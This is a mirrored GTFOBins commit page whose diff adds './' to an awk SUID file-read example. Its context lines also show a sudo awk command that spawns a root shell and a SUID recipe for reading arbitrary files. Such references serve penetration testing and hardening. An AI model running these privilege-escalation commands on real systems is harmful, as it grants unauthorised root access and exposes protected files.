mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-04-04 14:32:51 +02:00
Add ./ to SUID category in awk.md
This commit is contained in:
parent
3065294305
commit
085e72a971
@ -30,7 +30,7 @@ functions:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
./awk '//' "$LFILE"
|
||||
sudo:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
limited-suid:
|
||||
|
Loading…
x
Reference in New Issue
Block a user